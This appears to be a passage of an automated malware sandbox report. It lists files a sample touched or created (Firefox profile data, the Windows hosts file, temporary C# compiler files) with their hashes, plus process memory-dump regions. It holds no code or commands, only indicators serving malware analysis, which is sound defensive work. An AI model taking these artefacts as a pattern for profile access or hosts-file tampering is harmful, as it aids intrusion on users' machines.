C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\pending_pings\6bb89623-c485-466c-af9d-10b77a3ec90f

Filesize
1KB

MD5
4a0cf22ad3df97c14b2dbe3dfe83e8b1

SHA1
e2f7c3a44dd772f8644f6db9e59b393d7745fd45

SHA256
47da86ff715607e37d7b0f3db82205c5ba626ec692e8de5d8a5d742e0978c4d5

SHA512
ecf5a9296344e0ddafea8f2e74bcf6564534bd32e81d59faca2ab8183278af9f79e19eaf1d9ba58627beec535e337c2b616562d12d68c561b1be0fbba352c725

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\pending_pings\79ea68f0-22d4-4283-bbbb-b3a455e35348

Filesize
659B

MD5
32969d43084d04ae24a769286e62ddcb

SHA1
5e96c4f825d21b6cf2ecad226bca5367c71c424e

SHA256
f0d59c11b43edda86aca9aac8f553350893c01f5ae98f3edadc82d540360020c

SHA512
c1d07f82633ea6d753345d1897d7c4e09a95849f12d0f400b644b7919e5be2d1552fd6765480267a47b9931131c4953999ef4bd80d38327db670799cd756621c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\pending_pings\a033f159-1124-4b74-87f0-d0e8b8e91497

Filesize
27KB

MD5
2e1ec231c5022b6bd60ae04e582e9eed

SHA1
fd04144603cd78d0d4d910fe38b2ba44e62b4e19

SHA256
b4cd44a8959cd5425795fcf2c7b21683b0dbd67cfadde9c3e4e8c98997f920fe

SHA512
fb53571685d4821ba42058092045c57fd8c7ded7951e8e5f8d99287c27917471ca58cc36f366c579389fe99df05ab10d2c1f294efeb867ba260759b23e5724e4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\pending_pings\d00b7688-317e-4501-8f66-8e352a5b1d3d

Filesize
982B

MD5
672075fd2d5df56b7ade208e829ebbe1

SHA1
5568170d7e1d524a6efc56b8abc8cd917d1c9a75

SHA256
78c05ce1abf5dec0a00dc24a1fd8f73246ee84338503e5fef0b98752e0731643

SHA512
a53020cf5287a070931925dae36c12f4665d7c77dd2f8bc419c38dd45b22f8925b4a92f2ba05b35f818d811399fe24b8fbcc1271e30d032361a5785906dd77c5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\prefs-1.js

Filesize
11KB

MD5
7e58fb426557ea670364c50a0b326bd7

SHA1
db79983a43867815ce4519db63705a1c942552a4

SHA256
91febe1e27f278d09c4f43045a827c3ff6b1f587dd02079ec96f49888c74a588

SHA512
d7fc0772f8cebb4ed4e31c90bb5308f9d28c291198e791c922b4e711309d4f61ac02dedad13d19808b96bf8f32762676f5d9f7927f45d761ab87e5f8d60c73f9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\prefs-1.js

Filesize
10KB

MD5
644242eb4fc77fc39d260949e4a5859f

SHA1
dddcd80a7bc87b01d43b12e363c96ebdda2560e1

SHA256
80988700f2268c795ebfc334bf2742f572dafe97ed645b6d492b771371d79b04

SHA512
fa9dd73f9c55b4188a871fd5c3edb0e8f86e5290c626003de6e40a4e8ff64b7159cc2b347a8578e3a4abe464381e17cdcf44975b724bee6f6006245ce75c6def

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\prefs.js

Filesize
10KB

MD5
497acd1489421446f98b7027169f3816

SHA1
c6651d2af7104adbaa7e53af660b8aec6aadccc7

SHA256
ab4069cd6e634de1c49ed585f93afcd5ccff562833605ff4b7f5f420ac2f6727

SHA512
cbc31d61e809e93e3ed35b2d212d77611d25e24e677642233d1834c95b025307a0f28c79b451d7fa74fd2abd903706ccd6ced7c4ba291e6c744e467702d2fca8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\prefs.js

Filesize
10KB

MD5
a20f7a500af41858ac34431989f6492f

SHA1
7c5138340e57e39dcac990151c922a5dff6897af

SHA256
739c311b1b220827e2ecf8c744fc75e43e66a3633a941596e736026bde6a67f7

SHA512
cf88766e955e524c315203ebcf73ff787a1b8b94cdb3d6844ee35bbadeb8eccd38c3ec8cb314ff4adb5703eacdb26b5630bc2b27f5fc8903ba91969541b59207

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\prefs.js

Filesize
10KB

MD5
4ac4e5046f4c8cf9ffb269662e040c51

SHA1
3f1fe5b812662f9041db560c0c4086d5c222328a

SHA256
fbca25fb1f966da13fcd7cd7b2114471238d5e55e7130373ff7fab4b0469bab9

SHA512
45091536aee3e3b248de9466903a30a945d9a072692112feafc5e13db288b735495166e5e79d053cb1b5c6eb214555d139943af40568789959f5268ede74dd93

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\sessionCheckpoints.json

Filesize
90B

MD5
c4ab2ee59ca41b6d6a6ea911f35bdc00

SHA1
5942cd6505fc8a9daba403b082067e1cdefdfbc4

SHA256
00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

SHA512
71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\sessionCheckpoints.json

Filesize
53B

MD5
ea8b62857dfdbd3d0be7d7e4a954ec9a

SHA1
b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

SHA256
792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

SHA512
076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\sessionCheckpoints.json

Filesize
259B

MD5
e6c20f53d6714067f2b49d0e9ba8030e

SHA1
f516dc1084cdd8302b3e7f7167b905e603b6f04f

SHA256
50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092

SHA512
462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d1fiwgjv\CSCDB8A64E5B542440EA87123D92F303FA2.TMP

Filesize
652B

MD5
50b658e8ab8ef5c15d0609a958ce44cf

SHA1
ae42e3e35d7c626c6788e9923b2649221e92b9b2

SHA256
6d717fe5204e51f63da815748c3e206ac05c8394d90ab3710f6b256fd481965d

SHA512
30fa12f9103ae4f5eb6e3a36aed241a032f3f3b61e0dd8a8a8758380a1f30dc54ba89ccb7a8a422048ee134974b8173627dbd4ebd7a886b12952c13d5be4c6b7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d1fiwgjv\d1fiwgjv.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d1fiwgjv\d1fiwgjv.cmdline

Filesize
607B

MD5
7ba600d92267c0a0cb351c0cfb419d3b

SHA1
c716800a098e84952c857f895a785069616b8e74

SHA256
51d07a2f054af27dc0dbb20f5b67ac4bfbc81ec2c176a78ca89a1ea947aaba1c

SHA512
19c44555add828a0b6882e301cc94ca5b2d4e529a288dad9925f3477a6522b3853148d4711476851541f30154a6fc9b2d542b3421d37792e8aa6421fbb43a351

Download Submit
memory/1032-83-0x00000248FA020000-0x00000248FA042000-memory.dmp

Filesize
136KB

Download
memory/1032-108-0x00007FFEE2EE0000-0x00007FFEE39A2000-memory.dmp

Filesize
10.8MB

Download
memory/1032-82-0x00007FFEE2EE3000-0x00007FFEE2EE5000-memory.dmp

Filesize
8KB

Download
memory/1032-93-0x00007FFEE2EE0000-0x00007FFEE39A2000-memory.dmp

Filesize
10.8MB

Download
memory/1032-94-0x00007FFEE2EE0000-0x00007FFEE39A2000-memory.dmp

Filesize
10.8MB

Download
memory/3376-236-0x0000016762460000-0x0000016762468000-memory.dmp

Filesize
32KB

Download
memory/4784-318-0x00007FFEE3AD0000-0x00007FFEE3BEB000-memory.dmp

Filesize
1.1MB

Download
memory/4784-304-0x00007FFEF40D0000-0x00007FFEF40F5000-memory.dmp

Filesize
148KB

Download
memory/4784-309-0x00007FFEE4830000-0x00007FFEE49AF000-memory.dmp

Filesize
1.5MB

Download
memory/4784-303-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp

Filesize
6.8MB

Download
memory/4784-312-0x00007FFEF39E0000-0x00007FFEF3A13000-memory.dmp

Filesize
204KB

Download
memory/4784-313-0x00007FFEF3630000-0x00007FFEF36FD000-memory.dmp

Filesize
820KB

Download
memory/4784-214-0x00007FFEE4300000-0x00007FFEE4829000-memory.dmp

Filesize
5.2MB

Download
memory/4784-193-0x0000023F16EE0000-0x0000023F17409000-memory.dmp

Filesize
5.2MB

Download
memory/4784-192-0x00007FFEF3630000-0x00007FFEF36FD000-memory.dmp

Filesize
820KB

Download
memory/4784-113-0x00007FFEF39E0000-0x00007FFEF3A13000-memory.dmp

Filesize
204KB

Download
memory/4784-95-0x00007FFEE4830000-0x00007FFEE49AF000-memory.dmp

Filesize
1.5MB

Download
memory/4784-655-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp

Filesize
6.8MB

Download
memory/4784-701-0x00007FFEF3630000-0x00007FFEF36FD000-memory.dmp

Filesize
820KB

Download
memory/4784-700-0x00007FFEF39E0000-0x00007FFEF3A13000-memory.dmp

Filesize
204KB

Download
memory/4784-699-0x00007FFEF4370000-0x00007FFEF437D000-memory.dmp

Filesize
52KB

Download
memory/4784-698-0x00007FFEF3E50000-0x00007FFEF3E69000-memory.dmp

Filesize
100KB

Download
memory/4784-697-0x00007FFEE4830000-0x00007FFEE49AF000-memory.dmp

Filesize
1.5MB

Download
memory/4784-696-0x00007FFEF3A20000-0x00007FFEF3A44000-memory.dmp

Filesize
144KB

Download
memory/4784-695-0x00007FFEF3F20000-0x00007FFEF3F3A000-memory.dmp

Filesize
104KB

Download
memory/4784-694-0x00007FFEF3C30000-0x00007FFEF3C5D000-memory.dmp

Filesize
180KB

Download
memory/4784-693-0x00007FFEFB3E0000-0x00007FFEFB3EF000-memory.dmp

Filesize
60KB

Download
memory/4784-692-0x00007FFEF40D0000-0x00007FFEF40F5000-memory.dmp

Filesize
148KB

Download
memory/4784-676-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp

Filesize
6.8MB

Download
memory/4784-691-0x00007FFEE4300000-0x00007FFEE4829000-memory.dmp

Filesize
5.2MB

Download
memory/4784-690-0x00007FFEE3AD0000-0x00007FFEE3BEB000-memory.dmp

Filesize
1.1MB

Download
memory/4784-689-0x00007FFEF4250000-0x00007FFEF425D000-memory.dmp

Filesize
52KB

Download
memory/4784-688-0x00007FFEEAD80000-0x00007FFEEAD94000-memory.dmp

Filesize
80KB

Download
memory/4784-73-0x00007FFEE4300000-0x00007FFEE4829000-memory.dmp

Filesize
5.2MB

Download
memory/4784-77-0x00007FFEEAD80000-0x00007FFEEAD94000-memory.dmp

Filesize
80KB

Download
memory/4784-80-0x00007FFEF3A20000-0x00007FFEF3A44000-memory.dmp

Filesize
144KB

Download
memory/4784-81-0x00007FFEE3AD0000-0x00007FFEE3BEB000-memory.dmp

Filesize
1.1MB

Download
memory/4784-78-0x00007FFEF4250000-0x00007FFEF425D000-memory.dmp

Filesize
52KB

Download
memory/4784-74-0x00007FFEF40D0000-0x00007FFEF40F5000-memory.dmp

Filesize
148KB

Download
memory/4784-70-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp

Filesize
6.8MB

Download
memory/4784-71-0x00007FFEF3630000-0x00007FFEF36FD000-memory.dmp

Filesize
820KB

Download
memory/4784-72-0x0000023F16EE0000-0x0000023F17409000-memory.dmp

Filesize
5.2MB

Download
memory/4784-66-0x00007FFEF39E0000-0x00007FFEF3A13000-memory.dmp

Filesize
204KB

Download
memory/4784-63-0x00007FFEF3E50000-0x00007FFEF3E69000-memory.dmp

Filesize
100KB

Download
memory/4784-64-0x00007FFEF4370000-0x00007FFEF437D000-memory.dmp

Filesize
52KB

Download
memory/4784-60-0x00007FFEE4830000-0x00007FFEE49AF000-memory.dmp

Filesize
1.5MB

Download
memory/4784-57-0x00007FFEF3F20000-0x00007FFEF3F3A000-memory.dmp

Filesize
104KB

Download
memory/4784-58-0x00007FFEF3A20000-0x00007FFEF3A44000-memory.dmp

Filesize
144KB

Download
memory/4784-54-0x00007FFEF3C30000-0x00007FFEF3C5D000-memory.dmp

Filesize
180KB

Download
memory/4784-30-0x00007FFEF40D0000-0x00007FFEF40F5000-memory.dmp

Filesize
148KB

Download
memory/4784-48-0x00007FFEFB3E0000-0x00007FFEFB3EF000-memory.dmp

Filesize
60KB

Download
memory/4784-25-0x00007FFEE49B0000-0x00007FFEE5074000-memory.dmp

Filesize
6.8MB

Download